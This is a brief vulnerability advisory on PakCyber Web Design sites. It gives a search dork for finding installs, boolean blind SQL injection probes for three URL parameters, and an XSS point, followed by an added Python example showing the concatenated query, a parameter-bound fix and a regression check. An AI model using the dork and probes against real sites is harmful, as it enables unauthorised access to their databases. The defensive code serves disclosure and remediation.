PakCyber Web Design Multiple Vulnerabilities
Title : PakCyber Web Design Multiple Vulnerabilities
Found : by p0pc0rn
Vendor: http://pakcyber.com/
Dork : intext:"Powered By PakCyber"
Blind SQL Injection
-------------------
http://www.victim.com/site.php?article_id=[Blindey]
E.g.:
http://www.victim.com/full_article_text.php?article_id=808 and 1=1 (TRUE)
http://www.victim.com/full_article_text.php?article_id=808 and 1=2 (FALSE)
http://www.victim2.com/site.php?cid=[Blindey]
E.g.:
http://www.victim2.com/university.php?cid=8 or 1=1-- (TRUE)
http://www.victim2.com/university.php?cid=8 or 1=2-- (FALSE)
http://www.victim3.com/site.php?CatId=[Blindey]
E.g.:
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=1-- (TRUE)
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=2-- (FALSE)
There are more parameters that need to be checked. There is a high possibility that they are vulnerable to SQL injection too.
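Added example (not part of the original advisory, and not the vendor's code): why the TRUE/FALSE pair above yields different pages, and how binding the parameter removes the difference. The vendor's PHP source and schema are not shown, so the table `articles`, its columns, all function names and the in-memory SQLite database are assumptions standing in for the real query behind article_id.

```python
import sqlite3

def make_db():
    # Constructed sample data; the real schema is not shown in the advisory.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [(808, "Sample article"), (809, "Another article")])
    return db

def fetch_article_concat(db, article_id):
    # Assumed vulnerable pattern: the raw parameter is pasted into the SQL
    # text, so anything after the number is parsed as part of the WHERE clause.
    sql = "SELECT title FROM articles WHERE id = " + article_id
    return [row[0] for row in db.execute(sql).fetchall()]

def fetch_article_bound(db, article_id):
    # Hardened form: accept only a plain decimal id, then bind it as a value.
    if not (article_id.isascii() and article_id.isdigit()):
        raise ValueError("article_id must be a decimal integer")
    cur = db.execute("SELECT title FROM articles WHERE id = ?", (int(article_id),))
    return [row[0] for row in cur.fetchall()]

def response_differs(fetch, db, value_true, value_false):
    # Regression check: the handler is a boolean oracle if the two values
    # from the advisory produce different responses.
    def run(value):
        try:
            return ("ok", fetch(db, value))
        except ValueError:
            return ("rejected", None)
    return run(value_true) != run(value_false)

if __name__ == "__main__":
    db = make_db()
    for fetch in (fetch_article_concat, fetch_article_bound):
        print(fetch.__name__,
              response_differs(fetch, db, "808 and 1=1", "808 and 1=2"))
```

The same check applies to the cid and CatId parameters: after the fix, both values of each pair must produce an identical response.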
Cross Site Scripting
--------------------
http://www.victim.com/CategoryDetails.php?CatId=44&CatName=[XSS]
thanks,
#p0pc0rn#